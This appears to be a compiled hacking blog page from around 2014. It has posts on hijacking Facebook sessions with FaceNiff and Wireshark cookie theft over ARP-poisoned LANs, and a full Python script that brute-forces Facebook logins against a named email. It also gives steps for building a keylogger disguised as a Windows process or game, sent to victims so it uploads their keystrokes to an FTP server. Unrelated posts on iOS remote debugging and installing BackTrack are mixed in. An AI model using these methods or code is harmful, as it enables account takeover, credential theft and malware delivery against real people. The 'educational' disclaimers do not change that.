Hack Facebook thorugh Android Device or Mobile 2014


I Know Many of you were waiting for this Post about How to hack Facebook account using your android device.This tutorial is easier and you will get almost 95% success if you and your victim are on same network. This tutorial is totally based upon Android devices so you don't worry you don't want to have a pc or laptop for doing this or we can say for "Hacking A Facebook Account". I am writing this tutorial to make people aware so please make sure that you are not using this tutorial in any illegal way.

This tutorial is just for educational purpose.

There's a app Outhere Called "Faceniff". FACENIFF is basically an Android application that lets users sniff and intercept web session profiles over Wi-Fi networks, stealing other users' credentials through which you can attack your victim's Facebook, Orkut, Twitter and much more accounts in a minute.
Isn't it Cool :P

Note :- The Tutorial Only Works if you and your Victim are On Same WiFi Network

Follow The Given Steps Below :

1) At First Download Faceniff from below HERE
2) Connect to the working network connection and open the FaceNiff app.
3) Now click the red button and it will then turn green when the sniffer is on.It is like Firesheep for android devices.

Firesheep is a Firefox add-on that allowed unscrupulous users to do the same thing. FaceNiff has a leg up on Firesheep though, since the app runs on Android phones, doesn’t require any real customization to run, and even supports WPA encrypted wireless networks, as long as you’re already on the network.
4) Press the enter button and It would show a list of all the accounts which are connected to the network and you could hi jack into that all accounts.

5) Click on the account which you wish to hack and you will automatically logged in the account in which you wish you to. =D

6) Now you can do whatever you want with the hacked account

Note :- The App Only Work On Rooted Android Devices

Remote Debugging on iOS Device

debugging

With the ever-growing demand for mobile web browsing, there is a challenge with inspecting webpages on physical devices. So what’s a tester to do? Simple: remote debugging. We will show how to remotely debug on iOS and Android devices. Remote debugging offers the ability to inject JavaScript and turn on specific cookies in mobile browsers if needed based on the test environment.

iOS Devices:

To get started, you will need:

  • A Mac desktop or laptop
  • A USB cable that tethers the mobile device to the desktop/laptop
 On the Mac machine open Safari and click Preferences


debuging+tut+1



Then click the Advanced tab and check the box to enable “Show Develop menu in menu bar”. The following screen will appear:
 
debuging+tut+2
 
On the mobile device, tap the Settings icon, and then select Safari.


                                  


Tap Advanced and toggle Web Inspector to ON. The mobile device is now tethered to the Mac machine.


debuging+tut+4

Open Safari on the mobile device.  Tap Develop on the device. Select the web page that is currently displayed on the device as shown below:

debuging+tut+5

The web console is displayed as shown:

debuging+tut+6

Now you can begin debugging on your iOS device.

Install Backtrack in an Android Device | with Full Tutorial 2014

Click on image to zoom

Hello guys, today I'm going to show you the easiest way to install backtrack on an android device. For this tutorial you need:


All of the programs mentioned above are free. Ok, now let's start, The first thing you need to do is install Busybox on from Google Play :

Click on image to zoom
Install it, then open it when it's done, it will install some more things. When it's done, install Linux Installer from Google Play:

Click on image to ZOOM
Open Linux installer, then click on Install Guides from the list on your right hand side:


When you click that, you'll see a list of Linux distros, click on Backtrack and you will see a screen with steps on how to install it. Now click on the second page of those steps, you will get a page that looks like this:


Just click on "Download Image", and let it finish downloading. While it's downloading, open Google play and install Terminal Emulator, and Zarchiver.



When it finishes downloading, open Zarchiver, and look for the ZIP file that you downloaded, and extraxt the image into a root folder called "backtrack", extract the image into an external memory card not the internal one. Once it's done, open Linux Installer again, and click on launch, you'll get a screen that looks like this:


If it didn't recognize any distro, click on Setting > Edit then change the file path there to your backtrack image, the .img file that you extracted. When it finally say "backtrack" on the drop down list, click "Start Linux"  Terminal Emulator will open, you just have to proceed with the installation steps, ask you for a new password, and some preferences. When it's done you will get a red "root@localhost~#" like the picture bellow:


You are now in backtrack! 
Now if you want backtrack in GUI, open Google play, and install Android VNC:


Open It when it finishes installing, and it will look like this:


Set to the same settings in the picture, but not the IP address, you can get your IP by opening backtrack terminal, in terminal emulator, and running "ifconfig" command:


Settings for VNC are, 
Username: backtrack 
Password: backtrac 
IP: from the "ifconfig" 
command or just put 127.0.0.1  
Color Format: 24-bit Now click connect, and boom! 

You'r in backtrack Desktop! ;)


When you finis using it, remember to disconnect VNC  AND exit backtrack in Terminal Emulator, else it will be taking your battery in the background.


And note that Ubuntu can be installed in the same exact way, just the username and password for VNC will change. That's it guys, enjoy! :)


hack facebook with bruteforce method with hydra in Backtrack 5

1) go to privilege escalation then select online attacks and then select hydra


2) then use python script for the brute force attack you can attack the victim only when he is in online

3) get the python script
#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname     : facebookbruteforcer.py
# Programmer     : krishna_ <krishnakumar.m13@gmail.com>
# Version    : 1.0
# Date        : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me ;)

import re
import os
import sys
import random
import warnings
import time
try:
    import mechanize
except ImportError:
    print "[*] Please install mechanize python module first"
    sys.exit(1)
except KeyboardInterrupt:
    print "\n[*] Exiting program...\n"
    sys.exit(1)
try:
    import cookielib
except ImportError:
    print "[*] Please install cookielib python module first"
    sys.exit(1)
except KeyboardInterrupt:
    print "\n[*] Exiting program...\n"
    sys.exit(1)
    
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

# define variable 
__programmer__     = "gunslinger_ <yudha.gunslinger@gmail.com>"
__version__        = "1.0"
verbose     = False
useproxy    = False
usepassproxy    = False
log        = 'fbbruteforcer.log'
file        = open(log, "a")
success        = 'http://www.facebook.com/?sk=messages&amp;ref=mb'
fblogin     = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent     = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
            'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
            'Microsoft Internet Explorer/4.0b1 (Windows 95)',
            'Opera/8.00 (Windows NT 5.1; U; en)',
        'amaya/9.51 libwww/5.4.0',
        'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
        ]
facebook     = '''
  __               _                 _    
 / _|             | |               | |   
| |_ __ _  ___ ___| |__   ___   ___ | | __
|  _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_|  __/ |_) | (_) | (_) |   < 
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
                    bruteforcer...
                    
Programmer : %s
Version       : %s''' % (__programmer__, __version__)
option               = '''
Usage  : %s [options]
Option : -u, --username      <username>         |   User for bruteforcing
         -w, --wordlist      <filename>         |   Wordlist used for bruteforcing 
         -v, --verbose                |   Set %s will be verbose
         -p, --proxy         <host:port>    |   Set http proxy will be use
         -k, --usernameproxy    <username>    |   Set username at proxy will be use
         -i, --passproxy    <password>    |   Set password at proxy will be use
         -l, --log         <filename>    |   Specify output filename (default : fbbruteforcer.log)
         -h, --help          <help>             |   Print this help
                                                            
Example : %s -u brad@hackme.com -w wordlist.txt"
       
P.S : add "&" to run in the background  
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme         = '''
Usage : %s [option]
    -h or --help for get help
    ''' % sys.argv[0]


def helpme():
    print facebook
    print option
    file.write(facebook)
    file.write(option)
    sys.exit(1)
    
def helpmee():
    print facebook
    print hme
    file.write(facebook)
    file.write(hme)
    sys.exit(1)
    
for arg in sys.argv:
    try:
        if arg.lower() == '-u' or arg.lower() == '--user':
                    username = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                    wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-l' or arg.lower() == '--log':
                    log = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-p' or arg.lower() == '--proxy':
                useproxy = True
                    proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-k' or arg.lower() == '--userproxy':
                usepassproxy = True
                    usw = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-i' or arg.lower() == '--passproxy':
                usepassproxy = True
                    usp = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-v' or arg.lower() == '--verbose':
                    verbose = True
            elif arg.lower() == '-h' or arg.lower() == '--help':
                helpme()
        elif len(sys.argv) <= 1:
            helpmee()
    except IOError:
        helpme()
    except NameError:
        helpme()
    except IndexError:
        helpme()
                    
def bruteforce(word):
    try:
        sys.stdout.write("\r[*] Trying %s...                    " % word)
        file.write("[*] Trying %s\n" % word)
        sys.stdout.flush()
        br.addheaders = [('User-agent', random.choice(ouruseragent))]
        opensite = br.open(fblogin)
        br.select_form(nr=0)
        br.form['email'] = username
        br.form['pass'] = word
        br.submit()
        response = br.response().read()
        if verbose:
            print response
        if success in response:
            print "\n\n[*] Logging in success..."
            print "[*] Username : %s" % (username)
            print "[*] Password : %s\n" % (word)
            file.write("\n[*] Logging in success...")
            file.write("\n[*] Username : %s" % (username))
            file.write("\n[*] Password : %s\n\n" % (word))
            sys.exit(1)    
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        sys.exit(1)
    except mechanize._mechanize.FormNotFoundError:
        print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
        file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
        sys.exit(1)
    except mechanize._form.ControlNotFoundError:
        print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
        file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
        sys.exit(1)
        
def releaser():
    global word        
    for word in words:
        bruteforce(word.replace("\n",""))
        
def main():
    global br
    global words
    try:
        br = mechanize.Browser()
        cj = cookielib.LWPCookieJar()
        br.set_cookiejar(cj)
        br.set_handle_equiv(True)
        br.set_handle_gzip(True)
        br.set_handle_redirect(True)
        br.set_handle_referer(True)
        br.set_handle_robots(False)
        br.set_debug_http(False)
        br.set_debug_redirects(False)
        br.set_debug_redirects(False)
        br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
        if useproxy:
            br.set_proxies({"http": proxy})
        if usepassproxy:
            br.add_proxy_password(usw, usp)
        if verbose:
            br.set_debug_http(True)
            br.set_debug_redirects(True)
            br.set_debug_redirects(True)
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        file.write("\n[*] Exiting program...\n")
        sys.exit(1)
    try:
        preventstrokes = open(wordlist, "r")
        words            = preventstrokes.readlines()
        count          = 0 
        while count < len(words): 
            words[count] = words[count].strip() 
            count += 1 
    except IOError: 
          print "\n[*] Error: Check your wordlist path\n"
        file.write("\n[*] Error: Check your wordlist path\n")
          sys.exit(1)
    except NameError:
        helpme()
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        file.write("\n[*] Exiting program...\n")
        sys.exit(1)
    try:
        print facebook
        print "\n[*] Starting attack at %s" % time.strftime("%X")
        print "[*] Account for bruteforcing %s" % (username)
        print "[*] Loaded :",len(words),"words"
        print "[*] Bruteforcing, please wait..."
        file.write(facebook)
        file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
        file.write("\n[*] Account for bruteforcing %s" % (username))
        file.write("\n[*] Loaded : %d words" % int(len(words)))
        file.write("\n[*] Bruteforcing, please wait...\n")
    except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        sys.exit(1)
    try:
        releaser()
        bruteforce(word)
    except NameError:
        helpme()

if __name__ == '__main__':
    main()

4) then create a new file and upload this code and save it as facebookbruteforce.py


5) then put python facebookbruteforce.py


6) then put python facebookbruteforce.py -h


7) now you write your victim mail id facebookbruteforce.py -u krishnakumar.m13@gmail.com -w wordlist.txt


8) because we have to create a word list and upload that after that it will brute force the particular email and the password will be found in password.txt file


Facebook Hacking Complete Guide | Ebook |

Hack Fb Ebook

Table of Contents : 

1. Facebook Tips & Tricks     
1.1 Facebook Tips     
1.2. How to find Facebook Number   
1.3. How to access Facebook from G mail
1.4. Facebook Emotions codes
1.5. How to download Facebook in your PC…
 1.6. Download your Information 
1.7. Import your blog in Facebook 
    1.8. How to find if somebody hacked your Facebook account
1.9. How to change your name in Facebook
1.10. Export Email addresses of your Facebook account
1.11. How to create Facebook ID card  
    1.12. How to hide your Email address from Facebook apps
1.13. How to Delete and Terminate Facebook account 
1.14. How to Download Facebook photo album 
   1.15. How to add a forum (discussion board) to a page 
    1.16. Face book antivirus   

----------------------- Page 3-----------------------

1.17. How to alert Facebook fan page in your E-mail…  
 1.18. How to Show who is online on Facebook when you are in offline mode…
    1.19. How to send SMS using Facebook… 
   1.20. How to find new pages you might like  
  1.21. How to watch streaming TV on Facebook  
   1.22. How to create a map of your Facebook friend…     
1.23. Animated picture in Face book 
  1.24. Colored text, bold, underline, smiles in Facebook status…
    1.25. How to disable Facebook Timeline…    
1.26. How to disable Public search of your Facebook profile 
    1.27. How to Publish your Empty status
1.28. How to Surf Blocked Facebook 
2. Facebook Web Apps   
 2.1. How to Schedule Facebook massages Sendible     
 2.2. How to get Facebook updates on your Email  
  2.3. How to updates Facebook without using Face book    
 2.4. How to be notify when friend changes jobs     
2.5. How to view Facebook Profile History   

----------------------- Page 4-----------------------

    
2.6. How to Flip Facebook status updates     
2.7. How to find Shared videos on Facebook    
 2.8. Capture the wisdom of your social Network    
 2.9. Monitor your child Facebook activity     
 2.10. Manage your personal & professional image  
  2.11. How to track Facebook Activities  
  2.12. Create mosaics Profile picture on Facebook
2.13. Online store on Facebook    
  2.14. Online Face book Messenger…    
2.15. How to Analysis Facebook Fan page…     
 2.16. How to find who un friends you  
  2.17. How to download Videos from Facebook     
2.18. How to create slideshow of your Facebook album     
2.19. How to Create Custom Facebook tab
2.20. How to get Face book in Excel  
   2.21. How to connect Google docs to Facebook
 3. Facebook Software & Plugins     
 3.1. Facebook Color Changer   

----------------------- Page 5-----------------------

    3.2. Facebook adds blocker   
  3.3. How to connect Facebook, Twitter& Google 
3.4. Facebook Toggle all  
  3.5. How to Facebook Chat on your desktop Adium
    3.6. Facebook based web browser 
     3.7. Facebook E mail grabber   
 3.8. How to connect outlook to Facebook 
    4. Facebook Hacking & Security   
  4.1. Facebook phishing  
  4.2. Facebook Password Decryptor  
  4.3. Web browser Pass view … 
   4.4. How to Hack Facebook using Keylogger   
   4.5. How to Hack Password using Facebook Hacker  
    4.6. How to delete Your friend Account within 24 hour
    4.7. How to protect your Facebook account from Hacking   
  4.8. How to protect yourself from Keylogger & phishing attack

Download

Hack Facebook Through Wireshark [Full Tutorial with Screenshot]


In this tutorial we will see how you can hack facebook account using wireshark. First of all I must clear you even though you’ll get access to victim’s account you’ll not get his/her password, next this trick will work only on LAN with hub. It will also work on LAN with switch but you’ll have to perform ARP poisoning,

Here surely I ‘ll not discus how to use wireshark please read our previous post(on the Page) to know how to use wireshark.


For this hack you’ll need wireshark which is a packet sniffing tool, Mozilla Firefox web browser and add n edit add-on for Mozilla Firefox. Now I assume you have all above components for hacking facebook and you are connected in a hub based LAN or LAN which has been ARP poisoned. So now click on capture button and start capturing packets.


Now using command line shell ping www.facebook.com to get its IP address, filter all IP packets having IP address of www.facebook.com and search for HTTP protocol followed by GET /home.php, this may vary depending on region and time/zone but don’t bother try to search all packets with HTTP GET for cookies.


Now from packet details window expand the packet information for above packet and you’ll get 8-10 different cookies that are stored by www.facebook.com on victim’s PC. Right click and copy all cookies names and values in notepad.


Now open Mozilla Firefox browse to tools and open Cookie editor. Add each cookie to your cookie folder using Cookie editor.


After adding each value, your cookie editor will show you following values in cookie list for facebook.


Now close Cookie editor and open Facebook, you’ll find yourself logged into the victims account.



Defense against this attack:

A system administrator should use tools used for countering sniffing.

Don’t log-in into your accounts if you know your LAN is not protected and if you want to log-in better use a tunneled connection.



Download Wireshark from Click Here.



How to Hack Facebook : Keylogging Method


Things Needed:-Files needed :- Fearless keyspy v 2.0 Filezilla Ftp client 
Steps:-
1) Download and extract all the
files.
2) Open FKS 2.0.exe
3) Server name : enter any name
you want but it should resemble
to something related to
windows processes ,something
like “csrsss.exe” or “explore.exe”.
4) Reg key : leave it as it is.
5) Remove file : You could enter
any weird name.
6) Victim name : enter your
victim ‘s name .
7) Get and exec : Leave it as it is.
8) Go to Logging options by
clicking on “logging Options” in
Left side.
9) Log File Name : Enter your
victim ‘s name with
a .txt extension ex rishabh.txt
10) When log gets _____ bytes
long, upload it . : Enter 5000.
11) Go to “Upload Options” .
12) Enter the Ftp server details
accordingly Server host in “ ftp
server” ,user name in “FTP
user” ,password in FTP
password and /victim name in
“upload dir“.
13)After that click on Build
server and your keylogger will
create a file named server.exe in
the keylogger directory i.e. the
folder where you extracted the
Fks files.
14)Rename server.exe with
something cooler like “counter
strike 1.6” or anything else.
15)Send this file to your
Victims .As soon as he executes
the file ,His logs will start
uploading at your Ftp server.
16)After that open Filezilla and
fill your Ftp details.
Then it will show 2 columns one containing your Hard disk data in the right side and other in the left will be your Files in your web hosting account .  Download the logs to your pc and Search for email accounts and their passwords. 

Fearless Keyspy : Click Here to Download
Filezilla FTP Client : Click Here To Download